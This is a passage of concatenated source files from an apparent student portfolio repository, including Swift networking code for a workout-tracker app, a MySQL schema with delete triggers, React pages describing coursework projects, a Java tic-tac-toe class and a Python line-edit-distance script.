let url = URL(string: "https://workoutapp-262402.appspot.com/addWorkout?user_id=" + String(Variables.userID)
+ "&date=" + date + "&time=" + time + "&name=" + workoutName.text!)!
var request = URLRequest(url: url)
request.httpMethod = "POST"
let task = URLSession.shared.dataTask(with: request) {(data, response, error) in
guard let data = data else {return}
let result = String(data: data, encoding: .utf8)
let items = result?.components(separatedBy: ", ")
let wIDstr = String(items?[4] ?? "")
self.wID = wIDstr[5..<(wIDstr.count - 1)]
self.postExercises()
}
task.resume()
}
func postExercises() -> Void {
var count: Int = 0
for exercise in exercises{
let url = URL(string: "https://workoutapp-262402.appspot.com/addExercise?name=" + exercise.showName()
+ "&w_id=" + self.wID)!
var request = URLRequest(url: url)
request.httpMethod = "POST"
let task = URLSession.shared.dataTask(with: request) {(data, response, error) in
guard let data = data else {return}
print(String(data: data, encoding: .utf8) ?? "")
let result = String(data: data, encoding: .utf8)
let items = result?.components(separatedBy: ", ")
let eIDstr = String(items?[0] ?? "")
let eIDint = Int(eIDstr[28..<(eIDstr.count)])
exercise.setEID(eID: eIDint ?? -1)
self.postSets(currentEnum: count, currentExercise: exercise) // Only the sets associated with the exercise just posted
count += 1
}
task.resume()
}
}
func postSets(currentEnum: Int, currentExercise: Exercise) -> Void {
//For loop sets the eID in the sets based off the exerciseOrder when entered then posts the set
for s in sets{
if currentEnum == s.showExerciseOrder() {
s.setExerciseID(exerciseID: currentExercise.showEID())
//Posts the set
var urlString = "https://workoutapp-262402.appspot.com/addSet?reps="
urlString += s.showReps()
urlString += "&weight=" + s.showWeight()
urlString += "&orderNum=" + String(s.showOrderNum())
urlString += "&e_id=" + String(s.showExerciseID())
urlString += "&w_id=" + self.wID
let url = URL(string: urlString)!
var request = URLRequest(url: url)
request.httpMethod = "POST"
let task = URLSession.shared.dataTask(with: request) {(data, response, error) in
print(String(data: data!, encoding: .utf8) ?? "")
}
task.resume()
}
}
}
}
//For substring ability
extension String {
subscript(_ range: CountableRange<Int>) -> String {
let start = index(startIndex, offsetBy: max(0, range.lowerBound))
let end = index(startIndex, offsetBy: min(self.count, range.upperBound))
return String(self[start..<end])
}
subscript(_ range: CountablePartialRangeFrom<Int>) -> String {
let start = index(startIndex, offsetBy: max(0, range.lowerBound))
return String(self[start...])
}
}
<file_sep>/src/Components/ComS363/projectDDL.sql
drop database if exists `project`;
create database `project`;
use project;
drop table if exists userAccount;
create table userAccount(
screen_name varchar(40),
uname varchar(40),
sub_category char(40),
category char(40),
state char(15),
numFollowing int,
numFollowers int,
primary key(screen_name));
drop table if exists tweet;
create table tweet(
tid varchar(20),
textbody varchar(200),
retweet_count int,
posted varchar(20),
screen_name varchar(40) not null,
primary key(tid),
foreign key(screen_name) references userAccount(screen_name) on delete cascade);
drop table if exists hashtag;
create table hashtag(
h_tid varchar(20) not null,
hname varchar(100),
primary key(hname, h_tid),
foreign key(h_tid) references tweet(tid));
drop table if exists url;
create table url(
url_tid varchar(20) not null,
url_name varchar(500),
primary key(url_name, url_tid),
foreign key(url_tid) references tweet(tid));
drop table if exists mentioned;
create table mentioned(
tid varchar(20),
screen_name varchar(40),
primary key(tid, screen_name),
foreign key(tid) references tweet(tid));
-- foreign key(screen_name) references userAccount(screen_name));
set @enable_dth = 1;
set @enable_dtu = 1;
set @enable_dt = 1;
drop trigger if exists delete_tweet_hashtag;
delimiter $$
create trigger `delete_tweet_hashtag` after delete on `hashtag` for each row begin
if @enable_dth = 1 then
set @enable_dtu = 0;
set @enable_dt = 0;
delete from mentioned where old.h_tid = tid;
delete from url where old.h_tid = url_tid;
delete from tweet where old.h_tid = tid;
set @enable_dtu = 1;
set @enable_dt = 1;
end if;
end $$
delimiter ;
drop trigger if exists delete_tweet_url;
delimiter $$
create trigger `delete_tweet_url` after delete on `url` for each row begin
if @enable_dtu = 1 then
set @enable_dth = 0;
set @enable_dt = 0;
delete from mentioned where old.url_tid = tid;
delete from hashtag where old.url_tid = h_tid;
delete from tweet where old.url_tid = tid;
set @enable_dt = 1;
set @enable_dth = 1;
end if;
end $$
delimiter ;
drop trigger if exists delete_tweet;
delimiter $$
create trigger `delete_tweet` before delete on `tweet` for each row begin
if @enable_dt = 1 then
set @enable_dtu = 0;
set @enable_dth = 0;
delete from mentioned where old.tid = tid;
delete from hashtag where old.tid = h_tid;
delete from url where old.tid = url_tid;
set @enable_dth = 1;
set @enable_dtu = 1;
end if;
end $$
delimiter ;
drop trigger if exists delete_user;
delimiter $$
create trigger `delete_user` before delete on `userAccount` for each row begin
delete from tweet where old.screen_name = screen_name;
end $$
delimiter ;
<file_sep>/src/Components/WorkoutTracker/WorkoutTracker.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import './WorkoutTracker.css';
import Demo from './demo.mov';
import ProjectFiles from './workoutTrackerFiles.zip';
import ERDiagram from './ERdiagram.png';
import WorkoutControllerImage from './workoutController.png';
import WorkoutControllerFile from './WorkoutController.java';
import WorkoutImage from './workoutModel.png';
import WorkoutFile from './workout.java';
import ExerciseControllerImage from './exerciseController.png';
import ExerciseControllerFile from './ExerciseController.java';
import ExerciseImage from './exerciseModel.png';
import ExerciseFile from './exercise.java';
import DDLImage from './DDL.png';
import Storyboard from './navigation.png';
import ExerciseVCImage1 from './ExerciseViewControllerSS1.png';
import ExerciseVCImage2 from './ExerciseViewControllerSS2.png';
import ExerciseVCFile from './ExerciseViewController.swift';
import HistoryVCImage from './HistoryViewController.png';
import HistoryVCFile from './HistoryViewController.swift';
import DetailsVCImage from './DetailsViewController.png';
import DetailsVCFile from './DetailsViewController.swift';
const Title = Typography.Title;
export default class WorkoutTracker extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Mobile App to Web API - Workout Tracker</Title>
<Title level={4}>Technologies: Swift, Xcode, Java Springboot, MySQL, Google Cloud Platform</Title>
This app allows someone to track their weight lifting statistics during a workout and
then saves them to the cloud. The user can then look at a history of their workouts
and view the details of each one.
<br></br><br></br>
My previous work with iOS and the Google Cloud Platform (GCP) made me take an interest in
connecting a mobile app to a GCP API. I first started the server instance on GCP's App Engine
then deployed software to it with Java Springboot. I then connected the App Engine to
a GCP SQL instance to store user data. Next, I made an entity relation diagram and configured
the SQL instance with the SQL file I made from the diagram using MySQL. Lastly, I made
all the frontend components in Xcode that communicated with the server using HTTP requests.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={2}>Demo</Title>
<video controls width='50%'>
<source src={Demo}></source>
</video>
<Title level={4}>Entity relation diagram showing database design</Title>
<img width='100%' src={ERDiagram} alt=''/>
<Title level={4}>WorkoutController.java</Title>
<a href={WorkoutControllerFile} download="WorkoutController.java">
<img width='100%' src={WorkoutControllerImage} alt=''/>
</a>
<Title level={4}>Workout.java (the entity model of a workout)</Title>
<a href={WorkoutFile} download="Workout.java">
<img width='100%' src={WorkoutImage} alt=''/>
</a>
<Title level={4}>ExerciseController.java</Title>
<a href={ExerciseControllerFile} download="ExerciseController.java">
<img width='100%' src={ExerciseControllerImage} alt=''/>
</a>
<Title level={4}>exercise.java</Title>
<a href={ExerciseFile} download="exercise.java">
<img width='100%' src={ExerciseImage} alt=''/>
</a>
<Title level={4}>WorkoutTracker.sql</Title>
<img width='100%' src={DDLImage} alt=''/>
<Title level={4}>Main.storyboard (manages navigation and UI components)</Title>
</Col>
<Col span={24}>
<img width='100%' src={Storyboard} alt=''/>
</Col>
<Col span={18}>
<Title level={4}>ExerciseViewController.swift</Title>
<a href={ExerciseVCFile} download="ExerciseViewController.swift">
<img width='100%' src={ExerciseVCImage1} alt=''/>
<img width='100%' src={ExerciseVCImage2} alt=''/>
</a>
<Title level={4}>HistoryViewController.swift</Title>
<a href={HistoryVCFile} download="HistoryViewController.swift">
<img width='100%' src={HistoryVCImage} alt=''/>
</a>
<Title level={4}>DetailsViewController.swift</Title>
<a href={DetailsVCFile} download="DetailsViewController.swift">
<img width='100%' src={DetailsVCImage} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS227/A3/A3.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import ProjectFiles from './assignment3.zip';
import FlowGame from './FlowGame.java';
import FlowGameSS1 from './FlowGameSS1.png';
import FlowGameSS2 from './FlowGameSS2.png';
import FlowGameSS3 from './FlowGameSS3.png';
import guiSS1 from './guiSS1.png';
import guiSS2 from './guiSS2.png';
import guiSS3 from './guiSS3.png';
import Util from './Util.java';
import UtilSS1 from './UtilSS1.png';
import UtilSS2 from './UtilSS2.png';
const Title = Typography.Title;
export default class ComS227A3 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Color Flow Game - Assignment 3</Title>
<Title level={4}>Technology: Java, Eclipse</Title>
<li>Implemented the logic of a color flow game</li>
<li>Has ability to create a game from an input string or file</li>
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<img width='33%' src={guiSS1} alt=''/>
<img width='33%' src={guiSS2} alt=''/>
<img width='33%' src={guiSS3} alt=''/>
<Title level={4}>FlowGame.java (click on image to download file)</Title>
<a href={FlowGame} download="FlowGame.java">
<img width='100%' src={FlowGameSS1} alt=''/>
<img width='100%' src={FlowGameSS2} alt=''/>
<img width='100%' src={FlowGameSS3} alt=''/>
</a>
<Title level={4}>Util.java (click on image to download file)</Title>
<a href={Util} download="Util.java">
<img width='100%' src={UtilSS1} alt=''/>
<img width='100%' src={UtilSS2} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/WorkoutApp/HistoryViewController.swift
//
// HistoryViewController.swift
// workoutApp
//
// Created by <NAME> on 1/20/19.
// Copyright © 2019 <NAME>. All rights reserved.
//
import UIKit
class HistoryViewController: UIViewController, UITableViewDelegate, UITableViewDataSource {
@IBOutlet weak var HistoryTableView: UITableView!
override func viewDidLoad() {
super.viewDidLoad()
//Sample Data
/*
let exercise1 = Exercise(name: "bench", reps: [10,10,9,9], weight: [165,165,165,165])
let exercise2 = Exercise(name: "rows", reps: [9,9,9,9], weight: [120,120,120,120])
let exercise3 = Exercise(name: "deadlift", reps: [8,8,7,6], weight: [225,225,225,225])
let exercise4 = Exercise(name: "incline", reps: [10,10,10,10], weight: [80,80,80,80])
let workout1 = Workout(exercises: [exercise1!], date: "1/19/2019")
let workout2 = Workout(exercises: [exercise1!], date: "1/20/2019")
let workout3 = Workout(exercises: [exercise1!, exercise2!, exercise3!, exercise4!], date: "1/21/2019")
Variables.workouts.append(workout1!)
Variables.workouts.append(workout2!)
Variables.workouts.append(workout3!)
*/
}
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
return Variables.workouts.count
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
//let cell = UITableViewCell(style: UITableViewCell.CellStyle.default, reuseIdentifier: "cell")
let cell = tableView.dequeueReusableCell(withIdentifier: "cell", for: indexPath) as? HistoryTableViewCell
cell!.label.text = Variables.workouts[Variables.workouts.count - indexPath.row - 1].showDate()
return cell!
}
func tableView(_ tableView: UITableView, didSelectRowAt indexPath: IndexPath) {
Variables.clickedOn = Variables.workouts.count - indexPath.row - 1
}
/*
// MARK: - Navigation
// In a storyboard-based application, you will often want to do a little preparation before navigation
override func prepare(for segue: UIStoryboardSegue, sender: Any?) {
// Get the new view controller using segue.destination.
// Pass the selected object to the new view controller.
}
*/
}
<file_sep>/src/ClassComponents/ComS227/TallyClass/TallyClass.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import ProjectFiles from './miniAssignment1.zip';
import output from './output.png';
import TallyNumberJava from './TallyNumber.java';
import TallyNumberSS1 from './TallyNumberSS1.png';
import TallyNumberSS2 from './TallyNumberSS2.png';
import TallyNumberTestJava from './TallyNumberTest.java';
import TallyNumberTestPNG from './TallyNumberTest.png';
const Title = Typography.Title;
export default class TallyClass extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Tally Class - Assignment 1</Title>
<Title level={4}>Technology: Java, Eclipse</Title>
Here, I made a class that performed different actions on a tally numbering system.
Such 1 = | 2 = || 3 = ||| 5 = * and so on. Some of the program's methods include combining
two tally sets, converting a set to a number, and coverting a number to a tally.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>TallyNumber.java (click on image to download file)</Title>
<a href={TallyNumberJava} download="TallyNumber.java">
<img width='100%' src={TallyNumberSS1} alt=''/>
<img width='100%' src={TallyNumberSS2} alt=''/>
</a>
<Title level={4}>TallyNumberTest.java (click on image to download file)</Title>
<a href={TallyNumberTestJava} download="TallyNumberTest.java">
<img width='50%' src={TallyNumberTestPNG} alt=''/>
</a>
<Title level={4}>Output of TallyNumberTest.java</Title>
<img width='50%' src={output} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/ComS319/TicTacToe.java
package assignment1;
public class TicTacToe {
/**
* holds ' ' if empty, or 'X' or 'O' if not empty
*/
public char topLeft;
public char topMiddle;
public char topRight;
public char middleLeft;
public char middle;
public char middleRight;
public char bottomLeft;
public char bottomMiddle;
public char bottomRight;
/**
* starts the game off with spaces in each cell which signify empty
*/
public TicTacToe(){
topLeft = ' ';
topMiddle = ' ';
topRight = ' ';
middleLeft = ' ';
middle = ' ';
middleRight = ' ';
bottomLeft = ' ';
bottomMiddle = ' ';
bottomRight = ' ';
}
/**
* Makes a move in the cell corresponding to the location description. If the spot is taken, the method does returns false
* If the spot is not taken, the move will be made and the method will return true.
* @param s
* @param player
* @return True is spot vacant, false if it is
*/
public boolean makeMove(String s, char player){
if(s.equals("top left") && isTaken(topLeft) == false){
topLeft = player;
return true;
}
if(s.equals("top middle") && isTaken(topMiddle) == false){
topMiddle = player;
return true;
}
if(s.equals("top right") && isTaken(topRight) == false){
topRight = player;
return true;
}
if(s.equals("middle left") && isTaken(middleLeft) == false){
middleLeft = player;
return true;
}
if(s.equals("middle") && isTaken(middle) == false){
middle = player;
return true;
}
if(s.equals("middle right") && isTaken(middleRight) == false){
middleRight = player;
return true;
}
if(s.equals("bottom left") && isTaken(bottomLeft) == false){
bottomLeft = player;
return true;
}
if(s.equals("bottom middle") && isTaken(bottomMiddle) == false){
bottomMiddle = player;
return true;
}
if(s.equals("bottom right") && isTaken(bottomRight) == false){
bottomRight = player;
return true;
}
return false;
}
/**
* Helper method that checks if the spot is taken
* @param c
* @return false if not taken, true if taken
*/
private boolean isTaken(char c){
if(c == ' '){
return false;
}
else{
return true;
}
}
/**
* If there is a winner, the method will return 'O' or 'X'. If the game is a tie it will return 'T'.
* If the game isn't a tie and nobody has won, the method returns 'C'.
* @return C, O, X, or T
*/
public char checkGame(){
if(topLeft == 'O' && topMiddle == 'O' && topRight == 'O'){
return 'O';
}
if(topLeft == 'X' && topMiddle == 'X' && topRight == 'X'){
return 'X';
}
if(middleLeft == 'O' && middle == 'O' && middleRight == 'O'){
return 'O';
}
if(middleLeft == 'X' && middle == 'X' && middleRight == 'X'){
return 'X';
}
if(bottomLeft == 'O' && bottomMiddle == 'O' && bottomRight == 'O'){
return 'O';
}
if(bottomLeft == 'X' && bottomMiddle == 'X' && bottomRight == 'X'){
return 'X';
}
if(topLeft == 'O' && middleLeft == 'O' && bottomLeft == 'O'){
return 'O';
}
if(topLeft == 'X' && middleLeft == 'X' && bottomLeft == 'X'){
return 'X';
}
if(topMiddle == 'O' && middle == 'O' && bottomMiddle == 'O'){
return 'O';
}
if(topMiddle == 'X' && middle == 'X' && bottomMiddle == 'X'){
return 'X';
}
if(topRight == 'O' && middleRight == 'O' && bottomRight == 'O'){
return 'O';
}
if(topRight == 'X' && middleRight == 'X' && bottomRight == 'X'){
return 'X';
}
if(topLeft == 'O' && middle == 'O' && bottomRight == 'O'){
return 'O';
}
if(topLeft == 'X' && middle == 'X' && bottomRight == 'X'){
return 'X';
}
if(topRight == 'O' && middle == 'O' && bottomLeft == 'O'){
return 'O';
}
if(topRight == 'X' && middle == 'X' && bottomLeft == 'X'){
return 'X';
}
if(isTaken(topLeft) && isTaken(topMiddle) && isTaken(topRight) && isTaken(middleLeft) && isTaken(middle)
&& isTaken(middleRight) && isTaken(bottomLeft) && isTaken(bottomMiddle) && isTaken(bottomRight)){
return 'T';
}
return 'C';
}
/**
* resets the game with empty cells
*/
public void reset(){
topLeft = ' ';
topMiddle = ' ';
topRight = ' ';
middleLeft = ' ';
middle = ' ';
middleRight = ' ';
bottomLeft = ' ';
bottomMiddle = ' ';
bottomRight = ' ';
}
/**
* shows game on the console
*/
public void showGame(){
System.out.println(topLeft + " | " + topMiddle + " | " + topRight);
System.out.println("---------");
System.out.println(middleLeft + " | " + middle + " | " + middleRight);
System.out.println("---------");
System.out.println(bottomLeft + " | " + bottomMiddle + " | " + bottomRight);
}
}<file_sep>/src/ClassComponents/ComS228/Project1/Project1.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import BioSeqDataJava from './BioSeqData.java';
import BioSeqDataPNG from './BioSeqData.png';
import BSDoutput from './BSDoutput.png';
import DNASequenceJava from './DNASequence.java';
import DNASequencePNG from './DNASequence.png';
import GenDNASequencePNG from './GenDNAsequence.png';
import GenDNASequenceJava from './GenomicDNASequence.java';
import ProjectFiles from './hw1.zip';
import ProteinSequenceJava from './ProteinSequence.java';
import ProteinSequencePNG from './ProteinSequence.png';
import Sequence from './Sequence.java';
import SequenceSS1 from './SequenceSS1.png';
import SequenceSS2 from './SequenceSS2.png';
const Title = Typography.Title;
export default class Project1 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>DNA Example of Polymorphism - Project 1</Title>
<Title level={4}>Technology: Java, Eclipse</Title>
This project involved displaying data about example biological sequences. This kind of data is
good for experimenting with polymorphism because there are subtypes of DNA sequences such as
genomic DNA sequences and protein sequences.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>Sequence.java (click on image to download file)</Title>
<a href={Sequence} download="Sequence.java">
<img width='100%' src={SequenceSS1} alt=''/>
<img width='100%' src={SequenceSS2} alt=''/>
</a>
<Title level={4}>DNASequence.java (click on image to download file)</Title>
<a href={DNASequenceJava} download="DNASequence.java">
<img width='100%' src={DNASequencePNG} alt=''/>
</a>
<Title level={4}>GenomicDNASequence.java (click on image to download file)</Title>
<a href={GenDNASequenceJava} download="GenomicDNASequence.java">
<img width='100%' src={GenDNASequencePNG} alt=''/>
</a>
<Title level={4}>ProteinSequence.java (click on image to download file)</Title>
<a href={ProteinSequenceJava} download="ProteinSequence.java">
<img width='100%' src={ProteinSequencePNG} alt=''/>
</a>
<Title level={4}>BioSeqData.java (click on image to download file)</Title>
<a href={BioSeqDataJava} download="BioSeqData.java">
<img width='100%' src={BioSeqDataPNG} alt=''/>
</a>
<Title level={4}>Example output of BioSeqData.java</Title>
<img width='100%' src={BSDoutput} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/WorkoutTracker/exercise.java
package com.example.demo.model;
import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.Table;
@Entity
@Table(name="exercise")
public class exercise {
@Id
@Column(name="e_id")
@GeneratedValue(strategy = GenerationType.SEQUENCE)
private int e_id;
@Column(name="name")
private String name;
@Column(name="w_id")
private int wID;
public int getE_id() {
return e_id;
}
public void setE_id(int e_id) {
this.e_id = e_id;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public int getW_id() {
return wID;
}
public void setW_id(int w_id) {
this.wID = w_id;
}
@Override
public String toString() {
return "exercise [e_id=" + e_id + ", name=" + name + ", w_id=" + wID + "]";
}
}
<file_sep>/src/ClassComponents/CPRE185/Lab9/Lab9.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import lab9C from './lab9.c';
import lab9SS1 from './lab9SS1.png';
import lab9SS2 from './lab9SS2.png';
const Title = Typography.Title;
export default class Lab9 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Word Builder - Lab 9</Title>
<Title level={4}>Technology: C, Arduino Esplora</Title>
For this lab, I created a sentence builder program using the Arduino Esplora. The user
could navigate a list of words on the console screen using the buttons of the esplora.
They could then select the words and they would be added to a sentence at the top of
the console output.
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>lab9.c (click on image to download file)</Title>
<a href={lab9C} download="lab9.c">
<img width='100%' src={lab9SS1} alt=''/>
<img width='100%' src={lab9SS2} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS228/Project4/Project4.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import DictionaryJava from './Dictionary.java';
import DictionaryPNG from './Dictionary.png';
import EntryTree from './EntryTree.java';
import EntryTreeSS1 from './EntryTreeSS1.png';
import EntryTreeSS2 from './EntryTreeSS2.png';
import EntryTreeSS3 from './EntryTreeSS3.png';
import EntryTreeSS4 from './EntryTreeSS4.png';
import ProjectFiles from './hw4.zip';
import output1 from './output1.png';
import output2 from './output2.png';
import output3 from './output3.png';
const Title = Typography.Title;
export default class Project4 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Tree Data Structure - Project 4</Title>
<Title level={4}>Technology: Java, Eclipse</Title>
This project shows the implementation of a tree data structure with the parent and
child node objects being connected through the fields in the nodes. There are functions
like contains() which returns true if an input node is in the tree, and prefix() which
has a sequence of nodes as an input and returns an array of the longest occurrence of
the sequence in the tree.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>EntryTree.java (click on image to download file)</Title>
<a href={EntryTree} download="EntryTree.java">
<img width='100%' src={EntryTreeSS1} alt=''/>
<img width='100%' src={EntryTreeSS2} alt=''/>
<img width='100%' src={EntryTreeSS3} alt=''/>
<img width='100%' src={EntryTreeSS4} alt=''/>
</a>
<Title level={4}>Dictionary.java (click on image to download file)</Title>
<a href={DictionaryJava} download="Dictionary.java">
<img width='100%' src={DictionaryPNG} alt=''/>
</a>
<Title level={4}>Output of Dictionary.java</Title>
<img width='100%' src={output1} alt=''/>
<img width='100%' src={output2} alt=''/>
<img width='100%' src={output3} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/SeniorProject/SeniorProject.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import Presentation from './Final Presentation.pdf';
import UI from './UI.png';
const Title = Typography.Title;
export default class SeniorProject extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Microbiology Data Entry App - Senior Project</Title>
<Title level={4}>Technology: Python, Plotly, Pandas, PyQt5</Title>
For senior projects at Iowa State, students are put into groups of four to six and spend two
semesters working on a real-world project. In my case, I was on a team of six and we are making a
desktop graphing application for Iowa
State's microbiology department. Our app allows scientists to import Excel data about their experiments
and view a variety of graphs based on the data. We used Python to write the app and Python
libraries like Plotly to make customized graphs, Pandas to import and manage the data, PyQt5 for UI
construction, and Python's Pickle module for storing data locally.
<a href={Presentation} download="Presentation.pdf"> Click here to download our final Presentation.</a>
<a href="https://docs.google.com/file/d/124qSnbh09i01BNGcJzjEYOeTo_q1gbfD/preview" target="_blank" rel="noopener noreferrer"> Click here to view our demo video.</a>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<br></br>
<img width='100%' src={UI} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS311/Project2/q5.py
def line_edits(s1, s2):
"""function for generating the descriptions of line edits"""
l1 = s1.splitlines()
l2 = s2.splitlines()
result = editDistance(l1, l2)
result = result[::-1]
return result
def editDistance(l1, l2):
"""Helper function to generate the table for line edits"""
cache = [[None for i in range(len(l2) + 1)] for j in range(len(l1) + 1)]
for row in range(len(l1) + 1):
for col in range(len(l2) + 1):
if row == 0 and col == 0:
cache[row][col] = 0
elif col == 0:
cache[row][col] = row
elif row == 0:
cache[row][col] = col
elif l1[row - 1] == l2[col - 1]:
cache[row][col] = cache[row - 1][col - 1]
else:
a = cache[row - 1][col]
b = cache[row][col - 1]
c = cache[row - 1][col - 1]
cache[row][col] = min(a, b, c) + 1
return findResult(l1, l2, cache)
def findResult(l1, l2, table):
"""Helper function to find the result after the table has been built"""
rowH = len(l1)
colH = len(l2)
resultH = []
while rowH != 0 or colH != 0:
if colH == 0:
action = ('D', l1[rowH - 1], "")
resultH.append(action)
rowH = rowH - 1
elif rowH == 0:
action = ('I', "", l2[colH - 1])
resultH.append(action)
colH = colH - 1
elif l1[rowH - 1] == l2[colH - 1]:
action = ('T', l1[rowH - 1], l2[colH - 1])
resultH.append(action)
rowH = rowH - 1
colH = colH - 1
else:
rowH, colH, resultH = otherHelper(table, (l1, l2), rowH, colH, resultH)
return resultH
def otherHelper(table, l, rowH, colH, resultH):
"""helper method to shorten the above function"""
l1 = l[0]
l2 = l[1]
delete = table[rowH - 1][colH]
insert = table[rowH][colH - 1]
sub = table[rowH - 1][colH - 1]
if delete <= insert and delete <= sub:
action = ('D', l1[rowH - 1], "")
resultH.append(action)
rowH = rowH - 1
elif insert < delete and insert <= sub:
action = ('I', "", l2[colH - 1])
resultH.append(action)
colH = colH - 1
elif sub < delete and sub < insert:
lcs = longest_common_substring(l1[rowH - 1], l2[colH - 1])
action = ('S', findDiff(lcs, l1[rowH - 1]), findDiff(lcs, l2[colH - 1]))
resultH.append(action)
rowH = rowH - 1
colH = colH - 1
return rowH, colH, resultH
def findDiff(lcs, s):
"""function for finding the difference between the lcs and s"""
count = 0
extra = []
result = ""
for c in s:
if len(lcs) != 0 and lcs[0] == c:
lcs = lcs[1:]
else:
extra.append(count)
count += 1
realPosition = 0
for x in extra:
x += realPosition
before = s[:x]
after = s[x + 1:]
s = before + "[[" + s[x] + "]]" + after
realPosition += 4
return s
def longest_common_substring(s1, s2):
"""function for finding the LCS through recurison"""
cache = [[None for i in range(len(s2) + 1)] for j in range(len(s1) + 1)]
def recurse(s1, s2):
"""recursive helper function"""
if len(s1) == 0 or len(s2) == 0:
return ""
else:
a = s1[len(s1) - 1]
b = s2[len(s2) - 1]
if a == b:
if cache[len(s1)][len(s2)] != None:
return cache[len(s1)][len(s2)]
else:
s = recurse(s1[:len(s1) - 1], s2[:len(s2) - 1])
s = s + a
cache[len(s1)][len(s2)] = s
return s
if a != b:
one = None
two = None
if cache[len(s1) - 1][len(s2)] != None:
one = cache[len(s1) - 1][len(s2)]
else:
one = recurse(s1[:len(s1) - 1], s2)
cache[len(s1) - 1][len(s2)] = one
if cache[len(s1)][len(s2) - 1] != None:
two = cache[len(s1)][len(s2) - 1]
else:
two = recurse(s1, s2[:len(s2) - 1])
cache[len(s1)][len(s2) - 1] = two
if len(one) >= len(two): return one
elif len(two) > len(one): return two
return recurse(s1, s2)
s1 = "Line1\nLine2\nLine3\nLine4\n"
s2 = "Line1\nLine3\nLine4\nLine5\n"
s3 = "Line1\nLine2\nLine3\nLine4\n"
s4 = "Line5\nLine4\nLine3\n"
s5 = "Line1\n"
s6 = ""
s7 = "Line1\nLine 2a\nLine3\nLine4\n"
s8 = "Line5\nline2\nLine3\n"
table = line_edits(s7, s8)
for row in table:
print(row)<file_sep>/src/ClassComponents/CPRE288/CPRE288.js
import React from 'react';
import { Layout, Menu, Breadcrumb } from 'antd';
import { MenuOutlined, HomeOutlined } from '@ant-design/icons';
import '../../Components/HomePage/HomePage.css';
import { Redirect } from 'react-router-dom';
import FinalProject from './FinalProject/FinalProject.js';
import Lab5 from './Lab5/Lab5.js';
import Lab6 from './Lab6/Lab6.js';
const { Header, Content, Sider } = Layout;
export default class CPRE288 extends React.Component {
state = {
collapsed: false,
currentPage: "FinalProject"
}
onCollapse = collapsed => {
this.setState({ collapsed });
};
handleHomeClick = () => {
this.setState({
currentPage: "Home"
});
}
handleFinalProjectClick = () => {
this.setState({
currentPage: "FinalProject"
});
}
handleLab5Click = () => {
this.setState({
currentPage: "Lab5"
});
}
handleLab6Click = () => {
this.setState({
currentPage: "Lab6"
});
}
render() {
let page;
let width;
let pathItem1 = "default";
let pathItem2 = "default";
if (this.state.currentPage === "Home") {
return <Redirect to={"/Home"}/>
}
else if (this.state.currentPage === "FinalProject") {
page = <FinalProject/>
}
else if (this.state.currentPage === "Lab5") {
page = <Lab5/>
}
else if (this.state.currentPage === "Lab6") {
page = <Lab6/>
}
if (this.props.location.state.path === "Categories/LowLevel") {
pathItem1 = "Categories"
pathItem2 = "Low Level"
}
else if (this.props.location.state.path === "Years/Sophomore") {
pathItem1 = "Years"
pathItem2 = "Sophomore"
}
if (this.state.collapsed === true) {
width = 80;
}
else {
width = 400;
}
return (
<Layout style={{ minHeight: '100vh' }}>
<Sider
collapsible
collapsed={this.state.collapsed}
onCollapse={this.onCollapse}
breakpoint="xl"
width="400"
style={{
overflow: 'auto',
position: 'fixed',
height: '100vh',
left: 0,
}}
>
{this.state.collapsed===true ?
<div className="logo-collapsed">
BA
</div>
:
<div className="logo-expanded">
<NAME>
</div>
}
<Menu theme="dark" defaultSelectKeys={['1']} mode="inline">
<Menu.Item key="7" icon={<HomeOutlined/>} onClick={this.handleHomeClick}>
Home
</Menu.Item>
<Menu.Divider/>
<Menu.Item key="1" icon={<MenuOutlined/>} onClick={this.handleFinalProjectClick}>
Java GUI - Final Project
</Menu.Item>
<Menu.Item key="2" icon={<MenuOutlined/>} onClick={this.handleLab5Click}>
